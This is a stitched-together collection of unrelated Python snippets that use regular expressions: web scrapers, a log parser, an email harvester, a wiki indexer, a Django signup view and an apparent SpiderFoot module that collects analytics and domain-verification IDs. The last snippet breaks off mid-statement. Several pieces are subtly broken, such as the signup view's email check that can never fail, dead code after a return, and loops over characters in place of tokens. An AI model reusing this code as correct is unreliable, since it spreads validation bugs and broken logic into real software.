def getCssLinks(self): """获取css文件中的链接(一般主要有图片和其他css文件)""" f = open(self.file) css = f.read() f.close() def getNewLink(cl): up = urlparse(self.url) if (not up.path) or ('../' not in cl): return cl cs = cl.count('../')+1 newlink = up.scheme+'://'+up.netloc+'/'.join(up.path.split('/')[:-cs]) newlink = re.sub(r'(\.\./)+', newlink+'/', cl) return newlink # 图片链接 picLinks = re.findall(r'background:\s*url\s*\([\'\"]?([a-zA-Z0-9/\._-]+)[\'\"]?\)', css, re.I) # 其他css链接 cssLinks = re.findall(r'@import\s*[\'\"]*([a-zA-Z0-9/\._-]+)[\'\"]*', css, re.I) Links = picLinks + cssLinks cLinks = [] for cl in Links: cLinks.append(getNewLink(cl)) return cLinks
def parse_log(log_file): with open(log_file, 'r') as log_file2: log = log_file2.read() loss_pattern = r"Iteration (?P<iter_num>\d+), loss = (?P<loss_val>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)" losses = [] loss_iterations = [] fileName= os.path.basename(log_file) for r in re.findall(loss_pattern, log): loss_iterations.append(int(r[0])) losses.append(float(r[1])) loss_iterations = np.array(loss_iterations) losses = np.array(losses) accuracy_pattern = r"Iteration (?P<iter_num>\d+), Testing net \(#0\)\n.* accuracy = (?P<accuracy>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)" accuracies = [] accuracy_iterations = [] accuracies_iteration_checkpoints_ind = [] for r in re.findall(accuracy_pattern, log): iteration = int(r[0]) accuracy = float(r[1]) * 100 if iteration % 10000 == 0 and iteration > 0: accuracies_iteration_checkpoints_ind.append(len(accuracy_iterations)) accuracy_iterations.append(iteration) accuracies.append(accuracy) accuracy_iterations = np.array(accuracy_iterations) accuracies = np.array(accuracies) return loss_iterations, losses, accuracy_iterations, accuracies, accuracies_iteration_checkpoints_ind, fileName
def camel_case_match(string): """ Properly matches the camelCase naming style so that a name like writeXMLDocument gets parsed as ["write", "XML", "Document"]. """ return re.findall('(^[a-z]+|[A-Z][a-z]+|[A-Z]+|[0-9])(?![a-z])', string)
def parse_google_link(url): return url # now it seems to be ok real = re.findall('http[^&]*&', url)[0] ret = urllib.unquote(real[:-1]) return ret
def getImageList(html): reg = 'http[^"]*?\.jpg' imgre = re.compile(reg) imgList = re.findall(imgre,html) return imgList
def get_number_from_string(string): return [float(s) for s in re.findall(r"[-+]?\d*\.\d+|\d+", string)]
# Python for Informatics, Chapter 11, example 6 (page 132, section 11.2) # Prints out all possible email addresses from a file # (Anything that is string@string) import re hand = open('mbox-short.txt') for line in hand: line = line.rstrip() x = re.findall('\S+@\S+', line) if len(x) > 0: print x
def getArticleDetails(self, articles): print("Get Article Details...") artdic = {} # Define Webdriver driver = webdriver.Remote( command_executor='http://selenium-hub:4444/wd/hub', desired_capabilities=getattr(DesiredCapabilities, "FIREFOX")) RemoteConnection.set_timeout(36000) url = articles driver.get(url) # Get source code from page htmltext = driver.page_source soup = BeautifulSoup(htmltext, "lxml") driver.quit() # Extract field values and parse them to json / dictionary tempdic = {} try: tempdic['Article_ID'] = soup.find( "meta", attrs={"name": "parsely-post-id"})["content"] except: tempdic['Article_ID'] = "0" tempdic['URL'] = url tempdic['Title'] = soup.title.string tempdic['Author'] = soup.find("meta", attrs={"name": "author"})["content"] # Loop to extract clean date tempdic['PublishingDate'] = \ re.findall(r".+?(?=T)", soup.find("meta", property="article:published_time")["content"])[0] # Loop to extract no of responses and reading_time tempdic['Reading_time'] = re.findall( r"[0-9]", soup.find("meta", attrs={"name": "twitter:data1"})["value"])[0] try: tempdic['No_Responses'] = re.findall( r"[0-9]", soup.find("span", "az").string)[0] except: tempdic['No_Responses'] = 0 # Loop to extract tags li = soup.select("ul > li > a") tags = [] for link in li: tags.append(link.string) tempdic['Tags'] = tags # Loop to extract claps btns = soup.find_all("button") for button in btns: if button.string is None: pass else: try: tempdic['Claps'] = (int(button.string)) except: break # Loop to get clean text pagetext = "" text = soup.findAll("p") for t in text: pagetext += t.getText() # Clean special characters pagetext = (" ".join(re.findall(r"[A-Za-z0-9]*", pagetext))).replace(" ", " ") tempdic['Text'] = pagetext artdic[url] = tempdic return (artdic)
def words(text): return re.findall('[a-z]+', text.lower()) DICTIONARY = set(words(file(config.SPELLCHECKER_TEXT).read()))
import re, operator def update_location(tile, match): if match == 'e': direction = (2, 0) if match == 'se': direction = (1, -1) if match == 'sw': direction = (-1, -1) if match == 'w': direction = (-2, 0) if match == 'nw': direction = (-1, 1) if match == 'ne': direction = (1, 1) return tuple(map(operator.add, tile, direction)) flipped = set() tiles = [line for line in open('input.txt').read().strip().split('\n')] for tile in tiles: loc = (0, 0) matches = re.findall(r'(e|se|sw|w|nw|ne)', tile) for match in matches: loc = update_location(loc, match) if loc not in flipped: flipped.add(loc) else: flipped.remove(loc) print(len(flipped))
x_val = 0 y_ch1 = 0 y_ch2 = 0 fieldnames = ["x_val", "y_ch1", "y_ch2"] ser = serial.Serial() ser.baudrate = 9600 ser.port = 'COM3' ser.open() print("Is open:", ser.is_open) with open('data.csv', 'w') as csv_file: csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames) csv_writer.writeheader() while True: with open('data.csv', 'a') as csv_file: csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames) channel1 = ser.readline() channel2 = ser.readline() res_ch1 = re.findall(r'\d+', str(channel1)) res_ch2 = re.findall(r'\d+', str(channel2)) y_ch1 = int(res_ch1[1]) y_ch2 = int(res_ch2[1]) print(int(res_ch1[0]), int(res_ch1[1])) print(int(res_ch2[0]), int(res_ch2[1])) info = {"x_val": x_val, "y_ch1": y_ch1, "y_ch2": y_ch2} csv_writer.writerow(info) x_val += 1
def get_md5_file_name(file_path): file_name = os.path.basename(file_path) return re.findall(r"([a-fA-F\d]{32})", file_name)[0]
def toCamelCase(line): return re.findall(r'[A-Z](?:[a-z]+|[A-Z]*(?=[A-Z]|$))', line)
def process_text(doc_id, text): global tokens_count global title_file tokens = [] links = [] info_box = [] body = [] categories = [] references = [] #Convert to lower text text = text.lower() css = re.compile(r'{\|(.*?)\|}',re.DOTALL) cite = re.compile(r'{{v?cite(.*?)}}',re.DOTALL) files = re.compile(r'\[\[file:(.*?)\]\]',re.DOTALL) urls = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',re.DOTALL) # junk = re.compile(r"[~`!@#$%-^*+{\[}\]\|\\<>/?]",re.DOTALL) # Categories catRegExp = r'\[\[category:(.*?)\]\]' categories = re.findall(catRegExp,text,flags=re.MULTILINE) categories = ' '.join(categories) #categories = junk.sub(' ',categories) # categories = categories.split() tokenList = re.split(r'[^A-Za-z0-9]+', categories) for word in categories: if(len(word)>1): add_to_invereted_index(word, doc_id, "c") # Infobox infoRegExp = r'{{infobox(.*?)}}' info_box = re.findall(infoRegExp,text,re.DOTALL) for infoList in info_box: tokenList = [] tokenList = re.findall(r'=(.*?)\|',infoList,re.DOTALL) tokenList = ' '.join(tokenList) #tokenList = junk.sub(' ',tokenList) # tokenList = tokenList.split() tokenList = re.split(r'[^A-Za-z0-9]+', tokenList) for word in tokenList: if(len(word)>1): add_to_invereted_index(word, doc_id, "i") # References refRegExp = r'== ?references ?==(.*?)==' references = re.findall(refRegExp,text,flags=re.DOTALL) references = ' '.join(references) # print(references) #references = junk.sub(' ',references) # references = references.split() words = re.split(r'[^A-Za-z0-9]+', references) for word in references: if(len(word)>1): add_to_invereted_index(word, doc_id, "r") # External Links ei=0 ci=len(text) try: ei = text.index('=external links=')+20 ci = text.index('[[category:')+20 except: pass links = text[ei:ci] links = re.findall(r'\[(.*?)\]',text,flags=re.MULTILINE) links = ' '.join(links) # print(references) #links = junk.sub(' ',links) # links = links.split() words = re.split(r'[^A-Za-z0-9]+', links) for word in links: if(len(word)>1): add_to_invereted_index(word, doc_id, "e") text = urls.sub('',text) text = cite.sub('',text) text = files.sub('',text) text = css.sub('',text) # text = junk.sub(' ',text) # text = remove_punctuation(text) words = re.split(r'[^A-Za-z0-9]+', text) tokens_count += len(words) title_file.write(str(len(words))+"\n") # words = text.split() for word in words: if(len(word)>1 and len(word) < 46): add_to_invereted_index(word, doc_id, "b")
def handleEvent(self, event): eventName = event.eventType srcModuleName = event.module eventData = event.data sourceData = self.sf.hashstring(eventData) if sourceData in self.results: self.sf.debug(f"Skipping {eventData}, already checked.") return None self.results[sourceData] = True self.sf.debug(f"Received event, {eventName}, from {srcModuleName}") if event.moduleDataSource: datasource = event.moduleDataSource else: datasource = "Unknown" if eventName == 'TARGET_WEB_CONTENT': # Google Analytics matches = re.findall(r"\bua\-\d{4,10}\-\d{1,4}\b", eventData, re.IGNORECASE) for m in matches: if m.lower().startswith('ua-000000-'): continue if m.lower().startswith('ua-123456-'): continue if m.lower().startswith('ua-12345678'): continue self.sf.debug("Google Analytics match: " + m) evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google Analytics: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Google AdSense matches = re.findall(r"\b(pub-\d{10,20})\b", eventData, re.IGNORECASE) for m in matches: if m.lower().startswith('pub-12345678'): continue self.sf.debug("Google AdSense match: " + m) evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google AdSense: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Google Website Verification # https://developers.google.com/site-verification/v1/getting_started matches = re.findall(r'<meta name="google-site-verification" content="([a-z0-9\-\+_=]{43,44})"', eventData, re.IGNORECASE) for m in matches: self.sf.debug("Google Site Verification match: " + m) evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) matches = re.findall(r'<meta name="verify-v1" content="([a-z0-9\-\+_=]{43,44})"', eventData, re.IGNORECASE) for m in matches: self.sf.debug("Google Site Verification match: " + m) evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Quantcast if '_qevents.push' in eventData: matches = re.findall(r"\bqacct:\"(p-[a-z0-9]+)\"", eventData, re.IGNORECASE) for m in matches: self.sf.debug("Quantcast match: " + m) evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Quantcast: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Ahrefs Site Verification matches = re.findall(r'<meta name="ahrefs-site-verification" content="([a-f0-9]{64})"', eventData, re.IGNORECASE) for m in matches: self.sf.debug("Ahrefs Site Verification match: " + m) evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Ahrefs Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) if eventName == 'DNS_TEXT': # Google Website Verification # https://developers.google.com/site-verification/v1/getting_started matches = re.findall(r'google-site-verification=([a-z0-9\-\+_=]{43,44})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # LogMeIn Domain Verification # https://support.logmeininc.com/openvoice/help/adding-a-txt-record-to-a-dns-server-ov710011 matches = re.findall(r'logmein-domain-confirmation ([A-Z0-9]{24})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "LogMeIn Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) matches = re.findall(r'logmein-verification-code=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "LogMeIn Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # DocuSign Domain Verification # https://support.docusign.com/en/guides/org-admin-guide-domains matches = re.findall(r'docusign=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "DocuSign Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # GlobalSign Site Verification # https://support.globalsign.com/customer/en/portal/articles/2167245-performing-domain-verification---dns-txt-record matches = re.findall(r'globalsign-domain-verification=([a-z0-9\-\+_=]{42,44})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "GlobalSign Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Atlassian Domain Verification # https://confluence.atlassian.com/cloud/verify-a-domain-for-your-organization-873871234.html matches = re.findall(r'atlassian-domain-verification=([a-z0-9\-\+\/_=]{64})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Atlassian Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Adobe IDP Site Verification # https://helpx.adobe.com/au/enterprise/using/verify-domain-ownership.html matches = re.findall(r'adobe-idp-site-verification=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Adobe IDP Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) matches = re.findall(r'adobe-idp-site-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Adobe IDP Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Adobe Domain Verification # https://helpx.adobe.com/sign/help/domain_claiming.html matches = re.findall(r'adobe-sign-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Adobe Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Stripe Domain Verification # https://stripe.com/docs/apple-pay/web#going-live matches = re.findall(r'stripe-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Stripe Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # TeamViewer SSO Verification # https://community.teamviewer.com/t5/Knowledge-Base/Single-Sign-On-SSO/ta-p/30784 matches = re.findall(r'teamviewer-sso-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "TeamViewer SSO Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Aliyun Site Verification matches = re.findall(r'aliyun-site-verification=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Aliyun Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Facebook Domain Verification # https://developers.facebook.com/docs/sharing/domain-verification/ matches = re.findall(r'facebook-domain-verification=([a-z0-9]{30})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Facebook Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Citrix Domain Verification matches = re.findall(r'citrix-verification-code=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Citrix Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Dropbox Domain Verification # https://help.dropbox.com/teams-admins/admin/domain-insights-account-capture#verify matches = re.findall(r'dropbox-domain-verification=([a-z0-9]{12})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Dropbox Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Detectify Domain Verification # https://support.detectify.com/customer/en/portal/articles/2836806-verification-with-dns-txt- matches = re.findall(r'detectify-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Detectify Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Drift Domain Verification matches = re.findall(r'drift-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Drift Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Ahrefs Site Verification # https://help.ahrefs.com/en/articles/1431155-how-do-i-finish-crawling-my-website-faster-in-site-audit matches = re.findall(r'ahrefs-site-verification_([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Ahrefs Site Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Statuspage.io Domain Verification # https://help.statuspage.io/help/domain-ownership matches = re.findall(r'status-page-domain-verification=([a-z0-9]{12})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Statuspage Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Zoom.us Domain Verification # https://support.zoom.us/hc/en-us/articles/203395207-What-is-Managed-Domain- matches = re.findall(r'ZOOM_verify_([a-z0-9\-\+\/_=]{22})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Zoom.us Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Mail.ru Domain Verification matches = re.findall(r'mailru-verification: ([a-z0-9]{16})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Mail.ru Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Yandex Domain Verification matches = re.findall(r'yandex-verification: ([a-z0-9]{16})$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Yandex Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Brave Ledger Verification # https://support.brave.com/hc/en-us/articles/360021408352-How-do-I-verify-my-channel- matches = re.findall(r'brave-ledger-verification=([a-z0-9]+)$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Brave Ledger Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # have-i-been-pwned Verification matches = re.findall(r'have-i-been-pwned-verification=([a-f0-9]+)$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "have-i-been-pwned Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) # Cisco Live Domain Verification # https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2016/pdf/TECCOL-2982.pdf matches = re.findall(r'cisco-ci-domain-verification=([a-f0-9]+)$', eventData.strip(), re.IGNORECASE) for m in matches: evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Cisco Live Domain Verification: " + m, self.__name__, event) evt.moduleDataSource = datasource self.notifyListeners(evt) return None
def __parse_metadata_field(data: str) -> Dict[str, str]: metadata = {} for (_, key, value) in re.findall(r"<(xmp|pdfx|pdf|xmpMM):(.+)>(.+)</\1:\2>", data, re.I): metadata[key] = value return metadata
if result: base_sign = base_signs.format(i) try: driver.find_element_by_xpath(base_sign).click() except Exception: print("第" + str(count) + "条数据出现超时,尝试再次连接") driver.find_element_by_xpath(base_sign).click() sleep(1) all_hand = driver.window_handles driver.switch_to.window(all_hand[-1]) html = driver.page_source shop_name = driver.find_element_by_xpath('//h2').text shop_tel = ''.join(re.findall(r'客服电话:(.*?)</p>', html)) shop_address = ''.join(re.findall(r'联系地址:(.*?)</p>', html)) result = cursor.execute(sql_shop, [shop_name, shop_tel, shop_address]) client.commit() if result: print("成功添加了" + str(num) + "条数据") num += 1 driver.close() driver.switch_to.window(all_hand[0]) print("第" + str(page) + "页的内容搜集完毕") # if goods_salas < 5: # print("日销量5以下,不找啦")
def youkumovies(): flag = 0 boo = False countsum = 0 lg = { '内地': '普通话', '韩国': '韩语', '美国': '英语', '俄罗斯': '俄语', '比利时': '比利时语', '香港': '粤语', '台湾': '台语', '日本': '日语', '其他': '其他', '泰国': '泰语', '欧洲': '英语', '印度': '印度语', '英国': '英语', '中国': '普通话' } url = 'http://list.youku.com/category/show/c_96_s_6_d_1_p_%d.html?spm=a2h1n.8251845.0.0' for ii in range(0, 29): flag += 1 sum = 0 print( '..........................正在添加第%d页的信息.........................' % (flag)) page = url % (ii) req = requests.get(page) soup = BeautifulSoup(req.text, 'lxml') html = soup.find_all(class_='yk-col4 mr1') for n in html: sum += 1 countsum += 1 print( '>>>>>>>>>>>>>>>>>>>>>>>当前总共提取了 %d 条信息<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<' % (countsum)) print( '---------------------正在添加第 %d 页的第 %d 条信息------------------------' % (flag, sum)) if countsum >= 685: new_str = str(n) new_str = BeautifulSoup(new_str, 'lxml') html_str = str(new_str.find_all(class_='p-thumb')[0]) # print(html_str) try: info = re.findall( 'class="p-thumb"><a href="(.*?)" target="_blank"', html_str, re.S) except IndexError as e: info.append('') try: info.append( re.findall('target="_blank" title="(.*?)"></a>', html_str, re.S)[0].replace('\xa0', '')) except IndexError as e: info.append('') try: info.append( re.findall('</div><img _src="(.*?)" alt="', html_str, re.S)[0]) except IndexError as e: info.append('') try: info.append( re.findall('<span class="vip-free">(.*?)</span>', html_str, re.S)[0]) except IndexError as e: info.append('') if not ('预告' in info[3]): if (len(Movies.objects.filter(moviesname=info[1])) < 1): dan_req = requests.get('http:' + info[0]) new_html = dan_req.text.replace('\\n', '').replace( '\n', '').replace('\\', '') try: dan_url = 'https:' + re.findall( 'class="bg-dubo"></span> <a href="(.*?)" target="_blank"', new_html, re.S)[0] except IndexError as e: dan_url = 'https://www.baidu.com' req = requests.get(dan_url) y_html = BeautifulSoup(req.text, 'lxml') try: html_s = str(y_html.find_all(class_='p-base')[0]) tv_time = re.findall( '<label>上映:</label>(.*?)</span></li>', html_s, re.S)[0] info.append(tv_time) except IndexError as e: info.append('') html_s = '' try: tv_di = re.findall( '</li><li>地区:.*target="_blank">(.*?)</a></li><li>类型:', html_s, re.S)[0] info.append(tv_di) except IndexError as e: info.append('') tv_di = '其他' try: info.append(lg[tv_di]) except KeyError as e: info.append('') try: lei_s = re.findall( '</a></li><li>类型:<a(.*?)</li><li>', html_s, re.S)[0] dan_lei = re.findall('target="_blank">(.*?)</a>', lei_s, re.S) z_lei = '' for aa in dan_lei: z_lei += aa info.append(z_lei) except IndexError as e: info.append('') if info[2] != '': movies = Movies(moviesname=info[1], moviessource='优酷视频', moviesgrade=info[3], movieslanguage=info[6], moviestype=info[7], moviesdecade=info[4], moviesregion=info[5], pdatetime=info[4], moviesimageurl=info[2], moviesurl='https:' + info[0], moviesurl2='[]') movies.save() print( '成功的添加一条信息+++++++++++++++++++++++++++++++++++++++++++++++++++' ) else: print( '数据失败.............................................................' ) # print(info[:10]) elif len(Movies.objects.filter(moviesname=info[1])) >= 1: print( '已经添加本条信息!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!' ) print(info) else: print( '已经添加本条信息!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!' ) print(info) info.clear()
def dload_grib_files(grib_files, tropo_model='ERA5', snwe=None): """Download weather re-analysis grib files using PyAPS Parameters: grib_files : list of string of grib files Returns: grib_files : list of string """ print( '\n------------------------------------------------------------------------------' ) print('downloading weather model data using PyAPS ...') # Get date list to download (skip already downloaded files) grib_files_exist = check_exist_grib_file(grib_files, print_msg=True) grib_files2dload = sorted(list(set(grib_files) - set(grib_files_exist))) date_list2dload = [ str(re.findall('\d{8}', i)[0]) for i in grib_files2dload ] print('number of grib files to download: %d' % len(date_list2dload)) print( '------------------------------------------------------------------------------\n' ) # Download grib file using PyAPS if len(date_list2dload) > 0: hour = re.findall('\d{8}[-_]\d{2}', grib_files2dload[0])[0].replace('-', '_').split('_')[1] grib_dir = os.path.dirname(grib_files2dload[0]) # try 3 times to download, then use whatever downloaded to calculate delay i = 0 while i < 3: i += 1 try: if tropo_model in ['ERA5', 'ERAINT']: pa.ECMWFdload(date_list2dload, hour, grib_dir, model=tropo_model, snwe=snwe, flist=grib_files2dload) elif tropo_model == 'MERRA': pa.MERRAdload(date_list2dload, hour, grib_dir) elif tropo_model == 'NARR': pa.NARRdload(date_list2dload, hour, grib_dir) except: if i < 3: print( 'WARNING: the {} attampt to download failed, retry it.\n' .format(i)) else: print('\n\n' + '*' * 50) print( 'WARNING: downloading failed for 3 times, stop trying and continue.' ) print('*' * 50 + '\n\n') pass # check potentially corrupted files grib_files = check_exist_grib_file(grib_files, print_msg=False) return grib_files
def calculate_delay_timeseries(inps): """Calculate delay time-series and write it to HDF5 file. Parameters: inps : namespace, all input parameters Returns: tropo_file : str, file name of ECMWF.h5 """ def get_dataset_size(fname): atr = readfile.read_attribute(fname) shape = (int(atr['LENGTH']), int(atr['WIDTH'])) return shape # check existing tropo delay file if (ut.run_or_skip(out_file=inps.tropo_file, in_file=inps.grib_files, print_msg=False) == 'skip' and get_dataset_size(inps.tropo_file) == get_dataset_size( inps.geom_file)): print( '{} file exists and is newer than all GRIB files, skip updating.'. format(inps.tropo_file)) return # prepare geometry data geom_obj = geometry(inps.geom_file) geom_obj.open() inps.dem = geom_obj.read(datasetName='height') inps.inc = geom_obj.read(datasetName='incidenceAngle') if 'latitude' in geom_obj.datasetNames: # for dataset in geo OR radar coord with lookup table in radar-coord (isce, doris) inps.lat = geom_obj.read(datasetName='latitude') inps.lon = geom_obj.read(datasetName='longitude') elif 'Y_FIRST' in geom_obj.metadata: # for geo-coded dataset (gamma, roipac) inps.lat, inps.lon = ut.get_lat_lon(geom_obj.metadata) else: # for radar-coded dataset (gamma, roipac) inps.lat, inps.lon = ut.get_lat_lon_rdc(geom_obj.metadata) # calculate phase delay length, width = int(inps.atr['LENGTH']), int(inps.atr['WIDTH']) num_date = len(inps.grib_files) date_list = [str(re.findall('\d{8}', i)[0]) for i in inps.grib_files] tropo_data = np.zeros((num_date, length, width), np.float32) print( '\n------------------------------------------------------------------------------' ) print( 'calcualting absolute delay for each date using PyAPS (Jolivet et al., 2011; 2014) ...' ) print('number of grib files used: {}'.format(num_date)) if not inps.verbose: prog_bar = ptime.progressBar(maxValue=num_date) for i in range(num_date): grib_file = inps.grib_files[i] tropo_data[i] = get_delay(grib_file, inps) if not inps.verbose: prog_bar.update(i + 1, suffix=os.path.basename(grib_file)) if not inps.verbose: prog_bar.close() # remove metadata related with double reference # because absolute delay is calculated and saved for key in ['REF_DATE', 'REF_X', 'REF_Y', 'REF_LAT', 'REF_LON']: if key in inps.atr.keys(): inps.atr.pop(key) # Write tropospheric delay to HDF5 ts_obj = timeseries(inps.tropo_file) ts_obj.write2hdf5(data=tropo_data, dates=date_list, metadata=inps.atr) return inps.tropo_file
def signup(request): if request.method == 'POST': username = request.POST['username'] password1 = request.POST['password'] password2 = request.POST['repassword'] email = request.POST['email'] phone = request.POST['phone'] address = request.POST['address'] city = request.POST['city'] try: prime = request.POST['prime'] if prime == "on": prime = True except: prime = False state = request.POST['state'] image = request.FILES['image'] if User.objects.filter(username=username).exists(): messages.error(request, 'Username already taken') return redirect('/user/signup/') elif re.findall(r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$", email) == False: messages.error(request, 'Invalid Email') return redirect('/user/signup') elif User.objects.filter(email=email).exists(): messages.error(request, "Email already taken") return redirect('/user/signup/') elif phone.isnumeric() == False: messages.error(request, "Invalid phone number") return redirect('/user/signup/') elif city.isalnum() == True and city.isalpha() == False: messages.error(request, "Invalid city name") return redirect('/user/signup/') elif password1 != password2: messages.error(request, "Password not matched") return redirect('/user/signup/') else: user = User.objects.create_user(username=username, password=password1, email=email) new_cust = Client.objects.create(user=user, phone=phone, address=address, city=city, prime=prime, state=state, image=image) new_cust.save() messages.info(request, "You have been added successfully !!") auth.login(request, user) return redirect("/") else: return render(request, 'signup.html')
def process_command(inputs, message): if message.get("text") is not None: if message.get("text").startswith("/"): # SERVICE MAINTENANCE CHECK if function_switch == "OFF": print("Service down for maintenance") return inputs["serviceDown"] print("Current request json {}".format(message)) command_raw = message.get("text") bot_index_identifier = command_raw.find('@') if bot_index_identifier != -1: if command_raw[bot_index_identifier+1:] != telegram_bot_name: print("Not a command for Amaze bot, input command {}".format(command_raw[bot_index_identifier+1:])) raise ValueError() command_raw = command_raw[:bot_index_identifier] print("Found a new interaction with amaze bot for message: {}".format(command_raw)) if inputs and command_raw in inputs: # authenticate command permission if not is_command_permitted(command_raw, message): print("User not permitted for the command {}".format(command_raw)) return inputs["commandNotPermitted"] result_command = inputs[command_raw] print("Found resultCommand {}".format(result_command)) command_keyword = re.findall("##.+##", result_command) if len(command_keyword) != 0: print("Processing regex {} for result command {}".format(command_keyword[0], result_command)) try: return result_command.replace(command_keyword[0], "\n" + format_command(inputs, 